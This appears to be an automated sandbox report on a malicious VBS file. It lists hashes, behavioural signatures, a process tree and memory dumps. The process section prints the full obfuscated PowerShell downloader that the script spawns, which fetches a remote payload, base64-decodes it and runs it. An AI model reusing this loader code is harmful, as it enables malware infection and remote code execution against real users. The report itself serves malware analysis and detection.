Analysis
-
max time kernel
145s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
04-07-2024 01:41
Static task
static1
Behavioral task
behavioral1
Sample
8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59.vbs
Resource
win10v2004-20240611-en
General
-
Target
8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59.vbs
-
Size
413KB
-
MD5
be6f44242b4afd0e61d775b9ef7946b0
-
SHA1
80ce71becc7fb1203a43708d7e3fdcad778bb79e
-
SHA256
8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59
-
SHA512
e1778509074b9aad5fbc7de0947b887816c6f0308b4a347f181eb0dc92008125f7ef1b55184187d7c9cd99a6dfabb82ef858839cefa1185e1016ba0c3d45ba86
-
SSDEEP
6144:Ps58yYxqthfv2vF5aa++uQ8YTbBrD0Dz1EhMqcwu+T7wtVuqo41SqW8ZdbU8se0s:GMZcfqHmfRpcLnkd
Malware Config
Signatures
-
Blocklisted process makes network request 60 IoCs
Processes:
WScript.exepowershell.exeflow pid process 3 2208 WScript.exe 7 2620 powershell.exe 8 2620 powershell.exe 9 2620 powershell.exe 10 2620 powershell.exe 11 2620 powershell.exe 12 2620 powershell.exe 13 2620 powershell.exe 14 2620 powershell.exe 15 2620 powershell.exe 16 2620 powershell.exe 17 2620 powershell.exe 18 2620 powershell.exe 19 2620 powershell.exe 20 2620 powershell.exe 21 2620 powershell.exe 22 2620 powershell.exe 23 2620 powershell.exe 24 2620 powershell.exe 25 2620 powershell.exe 26 2620 powershell.exe 27 2620 powershell.exe 28 2620 powershell.exe 29 2620 powershell.exe 30 2620 powershell.exe 31 2620 powershell.exe 32 2620 powershell.exe 33 2620 powershell.exe 34 2620 powershell.exe 35 2620 powershell.exe 36 2620 powershell.exe 37 2620 powershell.exe 38 2620 powershell.exe 39 2620 powershell.exe 40 2620 powershell.exe 41 2620 powershell.exe 42 2620 powershell.exe 43 2620 powershell.exe 44 2620 powershell.exe 45 2620 powershell.exe 46 2620 powershell.exe 47 2620 powershell.exe 48 2620 powershell.exe 49 2620 powershell.exe 50 2620 powershell.exe 51 2620 powershell.exe 52 2620 powershell.exe 53 2620 powershell.exe 54 2620 powershell.exe 55 2620 powershell.exe 56 2620 powershell.exe 57 2620 powershell.exe 58 2620 powershell.exe 59 2620 powershell.exe 60 2620 powershell.exe 61 2620 powershell.exe 62 2620 powershell.exe 63 2620 powershell.exe 64 2620 powershell.exe 65 2620 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2620 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2208 wrote to memory of 2620 2208 WScript.exe powershell.exe PID 2208 wrote to memory of 2620 2208 WScript.exe powershell.exe PID 2208 wrote to memory of 2620 2208 WScript.exe powershell.exe PID 2620 wrote to memory of 2476 2620 powershell.exe cmd.exe PID 2620 wrote to memory of 2476 2620 powershell.exe cmd.exe PID 2620 wrote to memory of 2476 2620 powershell.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Shoo: DamTKvldlP.tpsmorp1Unde2U.de ');$Skumredes=$Methodizing[0];$Asprout= (Jimmis 'ps,u$ ffgSpidlStiroBrasbAdozaRudilPa t:,espNCh pyS ydk iltr Me iAutot enpiN nnkGlobkUpcueR llrfor nE.iceDjuks Non=CataNSouteDksdwU og- eneOTeleb,egejTh seTarmc bu.tint, medlSDropyGirss.athtOpree,hormRock..ritNIridetroutModi.SengWKopieBeskbPrinCGiftl ,eri.yvteColin .nit');$Asprout+=$Myoplastic[1];Fluorideringen ($Asprout);Fluorideringen (Jimmis 'Sa.f$ EndNTidsyretskAu,irTykmiDesttUddaiemptkDybfkBoureNatirAfp,nDdedeInkls R,a.CaboHrodneno,taBlomdvac e BikrK,desAloe[ Lin$CalaN .eceBillu Konr.mbroTrykcPoliaCruenShamaVamplUnac1Iglo5Yaff1 Red]Peri=F,de$M,noH Co.oAzoro Au.spapieUntagCystoRverwMaci ');$Antilogical=Jimmis 'Nedl$ RakN Prey ,opktallrGadeiKonstVer iApatkSatsk uleOverrNontnKodeeInussBlou. In DGrafoSchww Rumn El l AfrogallaDen.d.aasFStr,iDis lCupeeUdrj(Tas,$Mo,lSCrumk K.vuHy,omKo,mrAgnoeTripdR steRandsCa.a,Mi.j$Coypt Lany AponFlokgFloweDyn.nPlind CareUnbo)S mp ';$tyngende=$Myoplastic[0];Fluorideringen (Jimmis 'Dagk$ChargH,rrlSprioklepb Bega SublJ.mb:beskBRevid scrl Beledgn rSamasDeci=Egen(Ha,fTPrikeOversSku,tIndh-bimaPV riaTurrtNycthL no Natu$ Prit PreyAgisnPladg ntie EurnPantdKnageBags) Vrl ');while (!$Bdlers) {Fluorideringen (Jimmis 'None$ U sgAffelBoploPsylbPengaBrunlHand: sabSGre,y killSanstDelae E.stStilj RhosAf.rk,agdr Udeu Bu.kImpukPraceTopm=Timb$TarptPog,rCoulust te.rbi ') ;Fluorideringen $Antilogical;Fluorideringen (Jimmis ' BarSOph.tHy,eaMangrAvertCh.r-TotaSCitrl.axieAfkleBadmpn,na Hove4Afha ');Fluorideringen (Jimmis ' Hyd$Convg Haal minoMultbK nta ucllAbno:rummBOutfdFortl TroeSkumrBlgesDist=Midt(AltsTKna.eGenisVeritBall-PatePToe.aNonmtTolkh Ri. .tvb$Sndet,epeyHal.nUrogg Forese snSvovdCradeS.bs)Inha ') ;Fluorideringen (Jimmis 'Stok$ etrgSucclSindo TigbRustaR nglA.ph:FiskGExter JetaVa,mm LaimTaleaspart UngePhoss.toc=drug$WishgJ.hnlTyveoBefubFen.a pojlSial:.kvaASu anUr,isKonft DertAuslemrkelMoh.sMe,heSy esDrn oKosmm RecrSl,daAt.laUnmidSno,eBa mtuds.sDepo+Co y+H,pa% Tri$AfmaMFre eEjentDog h DetoTr.ndSaltiHo,sz OmgiSwinnMortg ,il.DelecVaeroDetau Ye.nSquatVan ') ;$Skumredes=$Methodizing[$Grammates];}$Marmorgulvenes=308881;$Renhedsgraders=29541;Fluorideringen (Jimmis ' The$Arbeg Nu,l Jugo.rombHyloa Stol Cou:,riaSAadscTochynu hp.raph xoiReplfUdadoEnerrBattmArnk2Barn4Bra,5Af,a ,aug= For iliGKokuesttttBary-Kon CSvinoFejln Spit TreeumaanTvant Ind Beto$LinitMajoyOparnTordgE uieBannnStvld,etheSeis ');Fluorideringen (Jimmis ' Meg$AcclgKerblTrepo EnsbClinaHvidltrac:TeknUSillnDe,iaHa,pn,ejltUnliiT,syqSa,iuArenaAbr,tGenneTurvd Scl Mist= Alk pre,[ SegS Foly,abesFlyvt,ulpeSlagm.arj.CaddCPitcoSolbnRerov IndeUnh rLactt ira] Win: ete:FrakFD.ifrChi oM.ngmQuipBHypoa LilsRedhe St,6Sous4SlapSBnhrtTromr K riPropnAstigScus( Waa$H liSHou,cEtagyStnkpTheahFolkiIa,rfknudoProprAfgimSer,2Genn4Sp.r5Krum) Fri ');Fluorideringen (Jimmis 'Trip$StargRep,lOveroTylsbbesta UnplCoal:DigyBbrusoIn knBlreaass,iUnecrRusseTokr Ste.=Kili Mod[VirkS Ga,yImpusHypstGrfberelimElod. SutTFasaeS.atxu dat,jer.archEDogmnSlapc .inoPiledS.ggiFuninSmmegPh.s]Steg: ns: creAFakeSMalvCSn wI MetI m n.pos GEtagearchtUmidS engtAnstrAfskiCivinFilogRe a(Kerm$.ehjU.phenTonia AranTubat Da,iKl iqFondu heraA.amtDataeEnked ,or)Morb ');Fluorideringen (Jimmis 'Sulp$CestgPolylImmeoi.vobDiska Brul F.n:Hv,dP Bi.rresaiph,toOsterHicciRejet Srge StatSlidsForphL beaDetovUnevePigerSkleeJgernfaddsSk,a= Su.$UnwaBDev oAlarnprogaSpliiProtrMoldeRe.u.TrfssShapu I tbDeposTak tforbrVid i SphnGaargcor.(Harp$ ,erMAnneaWomarUnchm S.goForjrPedigFr,nuImpulFiscvkommeMellnPen eUr ts M.d,schm$MythRGentehus n arihfibeetjredVrngsGunsgNormrH.lba kardMo meWorkr Saus S.u)nabo ');Fluorideringen $Prioritetshaverens;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2620-21-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmpFilesize
4KB
-
memory/2620-22-0x000000001B690000-0x000000001B972000-memory.dmpFilesize
2.9MB
-
memory/2620-23-0x0000000001E70000-0x0000000001E78000-memory.dmpFilesize
32KB
-
memory/2620-24-0x000007FEF57E0000-0x000007FEF617D000-memory.dmpFilesize
9.6MB
-
memory/2620-25-0x000007FEF57E0000-0x000007FEF617D000-memory.dmpFilesize
9.6MB
-
memory/2620-26-0x000007FEF57E0000-0x000007FEF617D000-memory.dmpFilesize
9.6MB
-
memory/2620-27-0x000007FEF57E0000-0x000007FEF617D000-memory.dmpFilesize
9.6MB
-
memory/2620-28-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmpFilesize
4KB
-
memory/2620-29-0x000007FEF57E0000-0x000007FEF617D000-memory.dmpFilesize
9.6MB